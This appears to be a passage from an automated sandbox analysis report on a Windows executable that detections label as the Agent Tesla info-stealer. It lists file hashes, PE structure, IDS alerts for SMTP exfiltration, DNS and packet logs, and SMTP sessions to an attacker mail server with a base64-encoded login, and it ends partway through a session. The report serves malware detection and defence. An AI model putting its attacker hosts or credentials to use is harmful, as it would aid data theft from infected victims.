                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02b0c61bb4\System.Xml.ni.dll",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..

                                              C:\Users\user\AppData\Roaming\itdtn.exe

                                              Download File
                                              Process:C:\Users\user\Desktop\Copy#51007602.exe
                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                              Category:dropped
                                              Size (bytes):293997803
                                              Entropy (8bit):7.999958137275388
                                              Encrypted:true
                                              SSDEEP:6291456:oKyCoMaDMA1Nqr82YaR1WF9Tsc+51bq/Npev/fti7d:vaDJ1NcATI+eHFE
                                              MD5:C62B7992DB97A6341DACBE7E3D936C74
                                              SHA1:94F76F39F7792333AEC8E1FD50473AB99405C67A
                                              SHA-256:0C62EEE5960587F9C25CF53E7D8F19301F6DCA9C5F14456CA03EB19FD4DA2E86
                                              SHA-512:CC14879D59941C6C14CC9F504FF5149CE1C6392EB141B47DCB2249A7CA6D85E7F670A5C6020B4D16E28BBA0E7B4B2E499519B9B6095B9DDB15594B9BEB621540
                                              Malicious:true
                                              Antivirus:
                                              • Antivirus: Avira, Detection: 100%
                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                              Reputation:low
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....ZTf.................t&...........&.. ....&...@.. .......................`)...........`..................................&.K.....&...............(..'...@)...................................................... ............... ..H............text...$s&.. ...t&................. ..`.rsrc.........&......v&.............@..@.reloc.......@).......(.............@..B..................&.....H..........._................"..........................................*...(....*...(....*.0..E................(.... ....~....{....:....& ....8....8........E........8....*....0..................(.... ....8....8........E....-...........8(...*...}.... ....~....{....:....& ....8.....(@... ....~....{....9....& ....8.....2.{....(....*.....{....*......(....*.0..<.......s.......}......}......}.......}.....{............s....(...+*&...(....*...0..:.......s.......}......}......}.....

                                              Static File Info

                                              General

                                              File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                              Entropy (8bit):7.828089429289105
                                              TrID:
                                              • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                              • Win32 Executable (generic) a (10002005/4) 49.97%
                                              • Generic Win/DOS Executable (2004/3) 0.01%
                                              • DOS Executable Generic (2002/1) 0.01%
                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                              File name:Copy#51007602.exe
                                              File size:2'696'656 bytes
                                              MD5:d503277ebd054e3a3ccfe906cac2e6d8
                                              SHA1:f209eb92df97e2569897f5da1097ae0d5b8d4bdb
                                              SHA256:7c9fb1f9b7c24c9e0608af47b246b224e295ebc18aecfee6a104a7046d9db19a
                                              SHA512:24bbde7eb917886ffd032a0eca589074ec3bae6de31570ccdbeac410fb4f92cb9ad7ace1190714c855ce905be72c859d414b01538bc56825be93ab3cf30682b9
                                              SSDEEP:49152:inZcMf/Ci3p4GHOtjAaA4Dmn4WA3JQ//pk3MEksafGEwLw+Fq:iCMB0jAR4DmG5QnpwMEksRLw+Fq
                                              TLSH:29C5F103B36689DAF0852F31C4D72E1A13759E50224EDE066D7A33D62D323E2E85F5DA
                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....ZTf.................t&...........&.. ....&...@.. .......................`)...........`................................

                                              File Icon

                                              Icon Hash:8fc34a4c4c4ac70f

                                              Static PE Info

                                              General

                                              Entrypoint:0x66931e
                                              Entrypoint Section:.text
                                              Digitally signed:true
                                              Imagebase:0x400000
                                              Subsystem:windows gui
                                              Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                              DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                              Time Stamp:0x66545AD8 [Mon May 27 10:05:12 2024 UTC]
                                              TLS Callbacks:
                                              CLR (.Net) Version:
                                              OS Version Major:4
                                              OS Version Minor:0
                                              File Version Major:4
                                              File Version Minor:0
                                              Subsystem Version Major:4
                                              Subsystem Version Minor:0
                                              Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                              Authenticode Signature

                                              Signature Valid:false
                                              Signature Issuer:CN=Microsoft Code Signing PCA 2011, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
                                              Signature Validation Error:The digital signature of the object did not verify
                                              Error Number:-2146869232
                                              Not Before, Not After
                                              • 19/10/2023 21:51:55 16/10/2024 21:51:55
                                              Subject Chain
                                              • CN=Microsoft Corporation, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
                                              Version:3
                                              Thumbprint MD5:CE375D7A0A494CFB6B46B4398281FD9B
                                              Thumbprint SHA-1:FBFF636EBB3DE3A9FD6A55111F00B16D2FDFCF3D
                                              Thumbprint SHA-256:80CA15275739BEF2CAF6E5A4168EB0A07FEB15883E8A4F232D93B8EECFE0F0EA
                                              Serial:33000003A4CBE356B8CB7FE4270000000003A4

                                              Entrypoint Preview

                                              Instruction
                                              jmp dword ptr [00402000h]
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al

                                              Data Directories

                                              NameVirtual AddressVirtual Size Is in Section
                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x2692d00x4b.text
                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x26a0000x28480.rsrc
                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x28fe000x27d0
                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x2940000xc.reloc
                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                              Sections

                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                              .text0x20000x2673240x2674007845c4ac766f12fa2473d5a5ec77e836unknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                              .rsrc0x26a0000x284800x2860039b340c00dede396df520d3c3bc09ec8False0.09177268769349846data3.8272508816153104IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                              .reloc0x2940000xc0x20055a9c22f83f624a76dc718f3f2432c20False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                              Resources

                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                              RT_ICON0x26a4600x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 5120.28763440860215056
                                              RT_ICON0x26a7480x128Device independent bitmap graphic, 16 x 32 x 4, image size 1280.46959459459459457
                                              RT_ICON0x26a8700x1628Device independent bitmap graphic, 64 x 128 x 8, image size 4096, 256 important colors0.13540197461212977
                                              RT_ICON0x26be980xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors0.18256929637526653
                                              RT_ICON0x26cd400x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors0.23104693140794225
                                              RT_ICON0x26d5e80x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors0.2420520231213873
                                              RT_ICON0x26db500xfc4PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.9199702675916749
                                              RT_ICON0x26eb140x94a8Device independent bitmap graphic, 96 x 192 x 32, image size 380160.03896888795459323
                                              RT_ICON0x277fbc0x67e8Device independent bitmap graphic, 80 x 160 x 32, image size 265600.046654135338345865
                                              RT_ICON0x27e7a40x5488Device independent bitmap graphic, 72 x 144 x 32, image size 216000.05254158964879852
                                              RT_ICON0x283c2c0x4228Device independent bitmap graphic, 64 x 128 x 32, image size 168960.053613604156825694
                                              RT_ICON0x287e540x3a48Device independent bitmap graphic, 60 x 120 x 32, image size 148800.06099195710455764
                                              RT_ICON0x28b89c0x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 96000.08101659751037345
                                              RT_ICON0x28de440x1a68Device independent bitmap graphic, 40 x 80 x 32, image size 67200.10443786982248521
                                              RT_ICON0x28f8ac0x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 42240.13320825515947468
                                              RT_ICON0x2909540x988Device independent bitmap graphic, 24 x 48 x 32, image size 24000.20450819672131149
                                              RT_ICON0x2912dc0x6b8Device independent bitmap graphic, 20 x 40 x 32, image size 16800.2377906976744186
                                              RT_ICON0x2919940x468Device independent bitmap graphic, 16 x 32 x 32, image size 10880.2907801418439716
                                              RT_GROUP_ICON0x291dfc0x102data0.6317829457364341
                                              RT_VERSION0x291f000x3ccdata0.40329218106995884
                                              RT_MANIFEST0x2922cc0x1b4XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (433), with no line terminators0.5642201834862385

                                              Imports

                                              DLLImport
                                              mscoree.dll_CorExeMain

                                              Network Behavior

                                              Snort IDS Alerts

                                              TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                              05/27/24-15:15:09.558181TCP2851779ETPRO TROJAN Agent Tesla Telegram Exfil49705587192.168.2.566.29.151.236
                                              05/27/24-15:15:21.815023TCP2855542ETPRO TROJAN Agent Tesla CnC Exfil Activity49715587192.168.2.566.29.151.236
                                              05/27/24-15:15:21.815023TCP2855245ETPRO TROJAN Agent Tesla Exfil via SMTP49715587192.168.2.566.29.151.236
                                              05/27/24-15:15:21.815023TCP2840032ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M249715587192.168.2.566.29.151.236
                                              05/27/24-15:15:21.815023TCP2851779ETPRO TROJAN Agent Tesla Telegram Exfil49715587192.168.2.566.29.151.236
                                              05/27/24-15:15:09.558181TCP2855542ETPRO TROJAN Agent Tesla CnC Exfil Activity49705587192.168.2.566.29.151.236
                                              05/27/24-15:15:09.558181TCP2855245ETPRO TROJAN Agent Tesla Exfil via SMTP49705587192.168.2.566.29.151.236
                                              05/27/24-15:15:09.558181TCP2840032ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M249705587192.168.2.566.29.151.236
                                              05/27/24-15:15:21.814973TCP2030171ET TROJAN AgentTesla Exfil Via SMTP49715587192.168.2.566.29.151.236
                                              05/27/24-15:15:09.558132TCP2030171ET TROJAN AgentTesla Exfil Via SMTP49705587192.168.2.566.29.151.236

                                              Network Port Distribution

                                              TCP Packets

                                              TimestampSource PortDest PortSource IPDest IP
                                              May 27, 2024 15:15:06.496284962 CEST49704443192.168.2.5104.26.13.205
                                              May 27, 2024 15:15:06.496316910 CEST44349704104.26.13.205192.168.2.5
                                              May 27, 2024 15:15:06.496531010 CEST49704443192.168.2.5104.26.13.205
                                              May 27, 2024 15:15:06.506858110 CEST49704443192.168.2.5104.26.13.205
                                              May 27, 2024 15:15:06.506889105 CEST44349704104.26.13.205192.168.2.5
                                              May 27, 2024 15:15:06.986428022 CEST44349704104.26.13.205192.168.2.5
                                              May 27, 2024 15:15:06.986521006 CEST49704443192.168.2.5104.26.13.205
                                              May 27, 2024 15:15:06.991034031 CEST49704443192.168.2.5104.26.13.205
                                              May 27, 2024 15:15:06.991087914 CEST44349704104.26.13.205192.168.2.5
                                              May 27, 2024 15:15:06.991452932 CEST44349704104.26.13.205192.168.2.5
                                              May 27, 2024 15:15:07.038691044 CEST49704443192.168.2.5104.26.13.205
                                              May 27, 2024 15:15:07.062499046 CEST49704443192.168.2.5104.26.13.205
                                              May 27, 2024 15:15:07.106513977 CEST44349704104.26.13.205192.168.2.5
                                              May 27, 2024 15:15:07.231180906 CEST44349704104.26.13.205192.168.2.5
                                              May 27, 2024 15:15:07.231241941 CEST44349704104.26.13.205192.168.2.5
                                              May 27, 2024 15:15:07.231328964 CEST49704443192.168.2.5104.26.13.205
                                              May 27, 2024 15:15:07.238195896 CEST49704443192.168.2.5104.26.13.205
                                              May 27, 2024 15:15:07.782078028 CEST49705587192.168.2.566.29.151.236
                                              May 27, 2024 15:15:07.787019968 CEST5874970566.29.151.236192.168.2.5
                                              May 27, 2024 15:15:07.787086010 CEST49705587192.168.2.566.29.151.236
                                              May 27, 2024 15:15:08.485460997 CEST5874970566.29.151.236192.168.2.5
                                              May 27, 2024 15:15:08.485768080 CEST49705587192.168.2.566.29.151.236
                                              May 27, 2024 15:15:08.490788937 CEST5874970566.29.151.236192.168.2.5
                                              May 27, 2024 15:15:08.647278070 CEST5874970566.29.151.236192.168.2.5
                                              May 27, 2024 15:15:08.648438931 CEST49705587192.168.2.566.29.151.236
                                              May 27, 2024 15:15:08.655977011 CEST5874970566.29.151.236192.168.2.5
                                              May 27, 2024 15:15:08.819082975 CEST5874970566.29.151.236192.168.2.5
                                              May 27, 2024 15:15:08.836431026 CEST49705587192.168.2.566.29.151.236
                                              May 27, 2024 15:15:08.842365026 CEST5874970566.29.151.236192.168.2.5
                                              May 27, 2024 15:15:09.039319038 CEST5874970566.29.151.236192.168.2.5
                                              May 27, 2024 15:15:09.039563894 CEST49705587192.168.2.566.29.151.236
                                              May 27, 2024 15:15:09.045516014 CEST5874970566.29.151.236192.168.2.5
                                              May 27, 2024 15:15:09.218732119 CEST5874970566.29.151.236192.168.2.5
                                              May 27, 2024 15:15:09.218997002 CEST49705587192.168.2.566.29.151.236
                                              May 27, 2024 15:15:09.224225044 CEST5874970566.29.151.236192.168.2.5
                                              May 27, 2024 15:15:09.394697905 CEST5874970566.29.151.236192.168.2.5
                                              May 27, 2024 15:15:09.394860029 CEST49705587192.168.2.566.29.151.236
                                              May 27, 2024 15:15:09.400449991 CEST5874970566.29.151.236192.168.2.5
                                              May 27, 2024 15:15:09.557445049 CEST5874970566.29.151.236192.168.2.5
                                              May 27, 2024 15:15:09.558131933 CEST49705587192.168.2.566.29.151.236
                                              May 27, 2024 15:15:09.558181047 CEST49705587192.168.2.566.29.151.236
                                              May 27, 2024 15:15:09.558222055 CEST49705587192.168.2.566.29.151.236
                                              May 27, 2024 15:15:09.558237076 CEST49705587192.168.2.566.29.151.236
                                              May 27, 2024 15:15:09.563108921 CEST5874970566.29.151.236192.168.2.5
                                              May 27, 2024 15:15:09.563127995 CEST5874970566.29.151.236192.168.2.5
                                              May 27, 2024 15:15:09.563138962 CEST5874970566.29.151.236192.168.2.5
                                              May 27, 2024 15:15:09.563149929 CEST5874970566.29.151.236192.168.2.5
                                              May 27, 2024 15:15:09.836204052 CEST5874970566.29.151.236192.168.2.5
                                              May 27, 2024 15:15:09.882370949 CEST49705587192.168.2.566.29.151.236
                                              May 27, 2024 15:15:18.285738945 CEST49714443192.168.2.5104.26.13.205
                                              May 27, 2024 15:15:18.285769939 CEST44349714104.26.13.205192.168.2.5
                                              May 27, 2024 15:15:18.285851002 CEST49714443192.168.2.5104.26.13.205
                                              May 27, 2024 15:15:18.289154053 CEST49714443192.168.2.5104.26.13.205
                                              May 27, 2024 15:15:18.289167881 CEST44349714104.26.13.205192.168.2.5
                                              May 27, 2024 15:15:18.765933037 CEST44349714104.26.13.205192.168.2.5
                                              May 27, 2024 15:15:18.766120911 CEST49714443192.168.2.5104.26.13.205
                                              May 27, 2024 15:15:18.772124052 CEST49714443192.168.2.5104.26.13.205
                                              May 27, 2024 15:15:18.772164106 CEST44349714104.26.13.205192.168.2.5
                                              May 27, 2024 15:15:18.772496939 CEST44349714104.26.13.205192.168.2.5
                                              May 27, 2024 15:15:18.826407909 CEST49714443192.168.2.5104.26.13.205
                                              May 27, 2024 15:15:18.870495081 CEST44349714104.26.13.205192.168.2.5
                                              May 27, 2024 15:15:19.582072020 CEST44349714104.26.13.205192.168.2.5
                                              May 27, 2024 15:15:19.582139969 CEST44349714104.26.13.205192.168.2.5
                                              May 27, 2024 15:15:19.582216024 CEST49714443192.168.2.5104.26.13.205
                                              May 27, 2024 15:15:19.588444948 CEST49714443192.168.2.5104.26.13.205
                                              May 27, 2024 15:15:20.144752026 CEST49715587192.168.2.566.29.151.236
                                              May 27, 2024 15:15:20.149946928 CEST5874971566.29.151.236192.168.2.5
                                              May 27, 2024 15:15:20.150089979 CEST49715587192.168.2.566.29.151.236
                                              May 27, 2024 15:15:20.769536018 CEST5874971566.29.151.236192.168.2.5
                                              May 27, 2024 15:15:20.769779921 CEST49715587192.168.2.566.29.151.236
                                              May 27, 2024 15:15:20.774854898 CEST5874971566.29.151.236192.168.2.5
                                              May 27, 2024 15:15:20.940330029 CEST5874971566.29.151.236192.168.2.5
                                              May 27, 2024 15:15:20.940650940 CEST49715587192.168.2.566.29.151.236
                                              May 27, 2024 15:15:20.945594072 CEST5874971566.29.151.236192.168.2.5
                                              May 27, 2024 15:15:21.112571001 CEST5874971566.29.151.236192.168.2.5
                                              May 27, 2024 15:15:21.112854004 CEST49715587192.168.2.566.29.151.236
                                              May 27, 2024 15:15:21.117763042 CEST5874971566.29.151.236192.168.2.5
                                              May 27, 2024 15:15:21.290049076 CEST5874971566.29.151.236192.168.2.5
                                              May 27, 2024 15:15:21.290302038 CEST49715587192.168.2.566.29.151.236
                                              May 27, 2024 15:15:21.295233965 CEST5874971566.29.151.236192.168.2.5
                                              May 27, 2024 15:15:21.465789080 CEST5874971566.29.151.236192.168.2.5
                                              May 27, 2024 15:15:21.465991974 CEST49715587192.168.2.566.29.151.236
                                              May 27, 2024 15:15:21.470875025 CEST5874971566.29.151.236192.168.2.5
                                              May 27, 2024 15:15:21.641460896 CEST5874971566.29.151.236192.168.2.5
                                              May 27, 2024 15:15:21.641686916 CEST49715587192.168.2.566.29.151.236
                                              May 27, 2024 15:15:21.646563053 CEST5874971566.29.151.236192.168.2.5
                                              May 27, 2024 15:15:21.813536882 CEST5874971566.29.151.236192.168.2.5
                                              May 27, 2024 15:15:21.814973116 CEST49715587192.168.2.566.29.151.236
                                              May 27, 2024 15:15:21.815022945 CEST49715587192.168.2.566.29.151.236
                                              May 27, 2024 15:15:21.815045118 CEST49715587192.168.2.566.29.151.236
                                              May 27, 2024 15:15:21.815064907 CEST49715587192.168.2.566.29.151.236
                                              May 27, 2024 15:15:21.819856882 CEST5874971566.29.151.236192.168.2.5
                                              May 27, 2024 15:15:21.819932938 CEST5874971566.29.151.236192.168.2.5
                                              May 27, 2024 15:15:21.819996119 CEST5874971566.29.151.236192.168.2.5
                                              May 27, 2024 15:15:21.820039034 CEST5874971566.29.151.236192.168.2.5
                                              May 27, 2024 15:15:22.105259895 CEST5874971566.29.151.236192.168.2.5
                                              May 27, 2024 15:15:22.147955894 CEST49715587192.168.2.566.29.151.236
                                              May 27, 2024 15:16:47.789150000 CEST49705587192.168.2.566.29.151.236
                                              May 27, 2024 15:16:47.795377970 CEST5874970566.29.151.236192.168.2.5
                                              May 27, 2024 15:16:47.953844070 CEST5874970566.29.151.236192.168.2.5
                                              May 27, 2024 15:16:47.954039097 CEST49705587192.168.2.566.29.151.236
                                              May 27, 2024 15:16:47.954103947 CEST5874970566.29.151.236192.168.2.5
                                              May 27, 2024 15:16:47.954241037 CEST49705587192.168.2.566.29.151.236
                                              May 27, 2024 15:16:47.958960056 CEST5874970566.29.151.236192.168.2.5

                                              UDP Packets

                                              TimestampSource PortDest PortSource IPDest IP
                                              May 27, 2024 15:15:06.407486916 CEST5470553192.168.2.51.1.1.1
                                              May 27, 2024 15:15:06.414974928 CEST53547051.1.1.1192.168.2.5
                                              May 27, 2024 15:15:07.765065908 CEST6133153192.168.2.51.1.1.1
                                              May 27, 2024 15:15:07.781482935 CEST53613311.1.1.1192.168.2.5

                                              DNS Queries

                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                              May 27, 2024 15:15:06.407486916 CEST192.168.2.51.1.1.10x68f0Standard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                              May 27, 2024 15:15:07.765065908 CEST192.168.2.51.1.1.10x2f4dStandard query (0)jahnindustry.shopA (IP address)IN (0x0001)false

                                              DNS Answers

                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                              May 27, 2024 15:15:06.414974928 CEST1.1.1.1192.168.2.50x68f0No error (0)api.ipify.org104.26.13.205A (IP address)IN (0x0001)false
                                              May 27, 2024 15:15:06.414974928 CEST1.1.1.1192.168.2.50x68f0No error (0)api.ipify.org172.67.74.152A (IP address)IN (0x0001)false
                                              May 27, 2024 15:15:06.414974928 CEST1.1.1.1192.168.2.50x68f0No error (0)api.ipify.org104.26.12.205A (IP address)IN (0x0001)false
                                              May 27, 2024 15:15:07.781482935 CEST1.1.1.1192.168.2.50x2f4dNo error (0)jahnindustry.shop66.29.151.236A (IP address)IN (0x0001)false

                                              HTTP Request Dependency Graph

                                              • api.ipify.org

                                              HTTPS Proxied Packets

                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              0192.168.2.549704104.26.13.2054434084C:\Users\user\Desktop\Copy#51007602.exe
                                              TimestampBytes transferredDirectionData
                                              2024-05-27 13:15:07 UTC155OUTGET / HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                              Host: api.ipify.org
                                              Connection: Keep-Alive
                                              2024-05-27 13:15:07 UTC211INHTTP/1.1 200 OK
                                              Date: Mon, 27 May 2024 13:15:07 GMT
                                              Content-Type: text/plain
                                              Content-Length: 12
                                              Connection: close
                                              Vary: Origin
                                              CF-Cache-Status: DYNAMIC
                                              Server: cloudflare
                                              CF-RAY: 88a645997cffc3f3-EWR
                                              2024-05-27 13:15:07 UTC12INData Raw: 38 2e 34 36 2e 31 32 33 2e 31 37 35
                                              Data Ascii: 8.46.123.175


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1192.168.2.549714104.26.13.2054433936C:\Users\user\AppData\Roaming\itdtn.exe
                                              TimestampBytes transferredDirectionData
                                              2024-05-27 13:15:18 UTC155OUTGET / HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                              Host: api.ipify.org
                                              Connection: Keep-Alive
                                              2024-05-27 13:15:19 UTC211INHTTP/1.1 200 OK
                                              Date: Mon, 27 May 2024 13:15:19 GMT
                                              Content-Type: text/plain
                                              Content-Length: 12
                                              Connection: close
                                              Vary: Origin
                                              CF-Cache-Status: DYNAMIC
                                              Server: cloudflare
                                              CF-RAY: 88a645e30b234269-EWR
                                              2024-05-27 13:15:19 UTC12INData Raw: 38 2e 34 36 2e 31 32 33 2e 31 37 35
                                              Data Ascii: 8.46.123.175


                                              SMTP Packets

                                              TimestampSource PortDest PortSource IPDest IPCommands
                                              May 27, 2024 15:15:08.485460997 CEST5874970566.29.151.236192.168.2.5220 server1.coleoffice.shop127.0.0.1 ESMTP Postfix
                                              May 27, 2024 15:15:08.485768080 CEST49705587192.168.2.566.29.151.236EHLO 609290
                                              May 27, 2024 15:15:08.647278070 CEST5874970566.29.151.236192.168.2.5250-server1.coleoffice.shop127.0.0.1
                                              250-PIPELINING
                                              250-SIZE 204800000
                                              250-ETRN
                                              250-STARTTLS
                                              250-AUTH PLAIN LOGIN
                                              250-AUTH=PLAIN LOGIN
                                              250-ENHANCEDSTATUSCODES
                                              250-8BITMIME
                                              250-DSN
                                              250 CHUNKING
                                              May 27, 2024 15:15:08.648438931 CEST49705587192.168.2.566.29.151.236AUTH login c2VuZGFuZWxsQGphaG5pbmR1c3RyeS5zaG9w
                                              May 27, 2024 15:15:08.819082975 CEST5874970566.29.151.236192.168.2.5334 UGFzc3dvcmQ6
                                              May 27, 2024 15:15:09.039319038 CEST5874970566.29.151.236192.168.2.5235 2.7.0 Authentication successful
                                              May 27, 2024 15:15:09.039563894 CEST49705587192.168.2.566.29.151.236MAIL FROM:<sendanell@jahnindustry.shop>
                                              May 27, 2024 15:15:09.218732119 CEST5874970566.29.151.236192.168.2.5250 2.1.0 Ok
                                              May 27, 2024 15:15:09.218997002 CEST49705587192.168.2.566.29.151.236RCPT TO:<nell@jahnindustry.shop>
                                              May 27, 2024 15:15:09.394697905 CEST5874970566.29.151.236192.168.2.5250 2.1.5 Ok
                                              May 27, 2024 15:15:09.394860029 CEST49705587192.168.2.566.29.151.236DATA
                                              May 27, 2024 15:15:09.557445049 CEST5874970566.29.151.236192.168.2.5354 End data with <CR><LF>.<CR><LF>
                                              May 27, 2024 15:15:09.558237076 CEST49705587192.168.2.566.29.151.236.
                                              May 27, 2024 15:15:09.836204052 CEST5874970566.29.151.236192.168.2.5250 2.0.0 Ok: queued as 4F18363DDC
                                              May 27, 2024 15:15:20.769536018 CEST5874971566.29.151.236192.168.2.5220 server1.coleoffice.shop127.0.0.1 ESMTP Postfix
                                              May 27, 2024 15:15:20.769779921 CEST49715587192.168.2.566.29.151.236EHLO 609290
                                              May 27, 2024 15:15:20.940330029 CEST5874971566.29.151.236192.168.2.5250-server1.coleoffice.shop127.0.0.1
                                              250-PIPELINING
                                              250-SIZE 204800000
                                              250-ETRN
                                              250-STARTTLS
                                              250-AUTH PLAIN LOGIN
                                              250-AUTH=PLAIN LOGIN
                                              250-ENHANCEDSTATUSCODES
                                              250-8BITMIME
                                              250-DSN
                                              250 CHUNKING
                                              May 27, 2024 15:15:20.940650940 CEST49715587192.168.2.566.29.151.236AUTH login c2VuZGFuZWxsQGphaG5pbmR1c3RyeS5zaG9w
                                              May 27, 2024 15:15:21.112571001 CEST5874971566.29.151.236192.168.2.5334 UGFzc3dvcmQ6
                                              May 27, 2024 15:15:21.290049076 CEST5874971566.29.151.236192.168.2.5235 2.7.0 Authentication successful
